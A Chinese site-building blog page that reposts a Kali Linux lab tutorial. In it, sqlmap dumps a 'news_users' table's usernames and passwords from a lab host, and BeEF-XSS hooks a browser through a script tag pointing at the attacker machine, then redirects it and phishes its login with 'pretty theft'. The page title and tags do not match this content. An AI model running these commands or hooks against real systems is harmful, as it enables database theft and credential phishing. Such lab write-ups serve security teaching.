企业官网建设流程全解析

首页 / 建站日记 / 企业官网建设流程全解析
网站开发与设计实训心得郑州官方最新通告
2026/1/29 11:20:03 网站建设 项目流程
网站开发与设计实训心得,郑州官方最新通告,哈尔滨个人建站模板,浩方网络网站建设文章目录 一、实验1.环境2.Kali Linux 进行SQL注入3.Kali Linux 进行XSS漏洞利用 二、问题1.XSS分类2.如何修改beef-xss的密码3.**beef-xss 服务如何管理**4.运行beef报错5.beef 命令的颜色有哪些区别6.owasp-top-10 有哪些变化 一、实验 1.环境 #xff08;1#xff09;主…文章目录一、实验1.环境2.Kali Linux 进行SQL注入3.Kali Linux 进行XSS漏洞利用二、问题1.XSS分类2.如何修改beef-xss的密码3.**beef-xss 服务如何管理**4.运行beef报错5.beef 命令的颜色有哪些区别6.owasp-top-10 有哪些变化一、实验1.环境1主机表1 主机系统版本IP备注Kali Linux2022.4192.168.204.154动态Windows10192.168.204.10Kali(2022.4)的目标主机2查看Kali Linux (2022.4)系统版本cat /etc/os-release3 查看Kali Linux (2022.4)系统IP地址ip addr | grep 1544Windows 查看IP地址ipconfig5Kali主机 ping Windows主机ping 192.168.204.102.Kali Linux 进行SQL注入(1) LAMP(LNMP)平台选择Windows版本https://www.xp.cn/download.html2sqlmap查阅https://github.com/sqlmapproject/sqlmap3获取服务器信息包括操作系统、数据库、 web 容器、后端语⾔sqlmap -u http://192.168.204.10/news/list.php?id464获取数据名称列表–thread 10 线程数设置为10sqlmap -u http://192.168.204.10/news/show.php?id46 --thread 10 -dbs5获取当前数据库名称sqlmap -u http://192.168.204.10/news/show.php?id46 --current-db6获取当前数据库中所有表的名称sqlmap -u http://192.168.204.10/news/show.php?id46 -D news --tables7获取当前数据库指定的表的字段名sqlmap -u http://192.168.204.10/news/show.php?id46 -D news -T news_users --columns8获取指定库指定表指定字段的值sqlmap -u http://192.168.204.10/news/show.php?id46 -D news -T news_users -C username,password --dump3.Kali Linux 进行XSS漏洞利用1漏洞测试平台选择Windows版本https://github.com/zhuifengshaonianhanlu/pikachu2kali 系统更新sudo apt-get update3安装rubyapt-get install ruby4安装beefapt-get install beef-xss5启动beef-xss┌──(root㉿kali)-[~] └─# beef-xss [-] You are using the Default credentials [-] (Password must be different from beef) [-] Please type a new password for the beef user: ┌──(root㉿kali)-[~] └─# beef-xss [-] You are using the Default credentials [-] (Password must be different from beef) [-] Please type a new password for the beef user: [i] GeoIP database is missing [i] Run geoipupdate to download / update Maxmind GeoIP database [*] Please wait for the BeEF service to start. [*] [*] You might need to refresh your browser once it opens. [*] [*] Web UI: http://127.0.0.1:3000/ui/panel [*] Hook: script srchttp://IP:3000/hook.js/script [*] Example: script srchttp://127.0.0.1:3000/hook.js/script ● beef-xss.service - beef-xss Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled) Active: active (running) since Wed 2024-03-27 10:57:29 CST; 5s ago Main PID: 26104 (ruby) Tasks: 4 (limit: 2248) Memory: 92.8M CPU: 3.246s CGroup: /system.slice/beef-xss.service └─26104 ruby /usr/share/beef-xss/beef 3月 27 10:57:34 kali beef[26104]: 24 CreateAutoloader: migrated (0.0013s) 3月 27 10:57:34 kali beef[26104]: 25 CreateXssraysScan: migrating 3月 27 10:57:34 kali beef[26104]: -- create_table(:xssraysscans) 3月 27 10:57:34 kali beef[26104]: - 0.0016s 3月 27 10:57:34 kali beef[26104]: 25 CreateXssraysScan: migrated (0.0016s) 3月 27 10:57:34 kali beef[26104]: [10:57:33][*] BeEF is loading. Wait a few seconds... 3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify BeEF::Extension::AdminUI::API::Handler JavaScript file: Invalid option: harmony 3月 27 10:57:34 kali beef[26104]: [10:57:34] |_ [AdminUI] Ensure nodejs is installed and node is in $PATH ! 3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify BeEF::Extension::AdminUI::API::Handler JavaScript file: Invalid option: harmony 3月 27 10:57:34 kali beef[26104]: [10:57:34] |_ [AdminUI] Ensure nodejs is installed and node is in $PATH ! [*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...6浏览器登录http://127.0.0.1:3000/ui/authentication(7) 输入账号密码账号输⼊beef密码输⼊123456进入系统(8) Windows 主机设置钩子script srchttp://192.168.204.154:3000/hook.js/script9beef获取目标主机10查看模块11选择重定向执行 (选择Execute)(12) Windows 主机页面重定向13选择pretty theft执行 (选择Execute)14Windows主机弹出登录界面15beef获取账号及密码二、问题1.XSS分类1类别1反射型XSS 2持久型XSS 3DOM型XSS2.如何修改beef-xss的密码1修改vim /etc/beef-xss/config.yaml(第7、8⾏)3.beef-xss 服务如何管理1开启服务1第一种方式 任意目录直接输入命令beef-xss 打开 过5秒左右然后它自动会打开命令行和浏览器beef的登录框 2第二种方式 进入/usr/share/beef-xss/输入命令./beef-xss 打开 然后手动打开浏览器链接2服务管理1开启beef服务 systemctl start beef-xss.service 2关闭beef服务 systemctl stop beef-xss.service 3重启beef服务 systemctl restart beef-xss.service4.运行beef报错1报错2原因分析需要管理员操作。3解决方法切换为管理员操作。5.beef 命令的颜色有哪些区别1区别1绿⾊ 命令模块可以在⽬标浏览器上运⾏且⽤户不会感到任何异常 2灰⾊ 命令模块尚未针对⽌⼀⼝此⽬标进⾏验证不知道是否可运⾏ 3橙⾊ 命令模块可以在⽬标浏览器上运⾏但是⽤户可能会感到异常(例如弹窗、提示、跳转等) 4红⾊ 命令模块不适⽤于此⽬标6.owasp-top-10 有哪些变化1官网http://www.owasp.org.cn/OWASP-CHINA/owasp-project/2021-owasp-top-10/2变化最近2次的变化网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取
标签: 网站建设 企业官网 项目流程 UI设计 前端开发

热门文章

文章分类

标签云

网站建设 响应式设计 用户体验 SEO优化 前端开发 小程序 电商平台 性能优化

相关文章

您可能感兴趣的其他内容

深圳网站建设公司设计公司为什么有的网站打不开
2026/1/24 17:22:57 网站建设

深圳网站建设公司设计公司为什么有的网站打不开

从触发器到状态机:一次完整的时序逻辑电路设计实战你有没有遇到过这样的情况?写好了Verilog代码,仿真看着一切正常,烧进FPGA后却“抽风”不断——输出乱跳、状态丢失、复位失效……最后只能一头扎进时序违例的泥潭里反复挣扎。这其…...

阅读更多 →
滁州市住房城乡建设部网站济南的企业网站建设
2026/1/20 2:15:36 网站建设

滁州市住房城乡建设部网站济南的企业网站建设

语燕输入法完整使用指南:从新手到高手的终极教程 【免费下载链接】YuyanIme 语燕拼音输入法-一款基于Rime定制开发的九键、全拼、双拼、手写、火星文等方案、支持悬浮、单手、数字行等键盘模式的中文输入法 项目地址: https://gitcode.com/gh_mirrors/yu/YuyanIme…...

阅读更多 →
4徐汇区网站建设石家庄专门做网站的公司
2026/1/29 4:21:00 网站建设

4徐汇区网站建设石家庄专门做网站的公司

还在为无法保存喜爱的网络视频而苦恼吗?VideoDownloadHelper这款强大的浏览器扩展工具能够完美解决您的下载需求!作为一款专业的视频解析工具,它能够智能识别网页中的视频资源,让您轻松将喜欢的视频内容保存到本地设备。 【免费下…...

阅读更多 →

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询